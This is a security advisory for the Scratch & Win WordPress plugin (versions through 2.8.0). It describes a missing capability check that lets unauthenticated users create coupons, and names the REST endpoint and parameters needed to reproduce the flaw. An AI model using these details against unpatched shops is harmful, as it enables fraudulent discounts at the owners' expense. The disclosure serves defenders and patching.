Appsmav Scratch & Win – Giveaways and Contests
Moderate fix1 remedy
Moderate fix1 remedy
- <= 2.8.0
Scratch & Win WordPress Plugin Missing Authorization Vulnerability Allows Unauthenticated Coupon Creation
Vulnerability
Patched
A vulnerability exists in the Scratch & Win – Giveaways and Contests plugin for WordPress, in versions through 2.8.0. The issue arises from a lack of proper capability checks in the apmswn_create_discount() function, allowing unauthenticated users to create coupons. This unauthorized access could be exploited to generate discount codes without any verification or authentication.
Impact
Exploitation of this vulnerability allows for unauthorized coupon creation, which could be misused to apply discounts or promotions without proper authorization.
Reproduction
The vulnerability can be reproduced by sending a POST request to the WordPress site's REST API endpoint '/wp-json/swinwoo/v1/createCouponSWIN' without authentication. The request must include the 'cpn_type', 'swin_code', 'cpn_value', 'free_ship', 'min_order', and 'cpn_descp' parameters. The absence of a capability check in the 'apmswn_create_discount()' function allows this action to be performed by unauthenticated users.
Remediation
Users are advised to update the Scratch & Win – Giveaways and Contests plugin to version 2.9.0 or later.
Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM
Vulnerability Rating
Custom Algorithm
spread
0.0impact
0.6exploitability
8.4remediation
7.7relevance
0.0threat
4.8urgency
2.9incentive
5.8Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.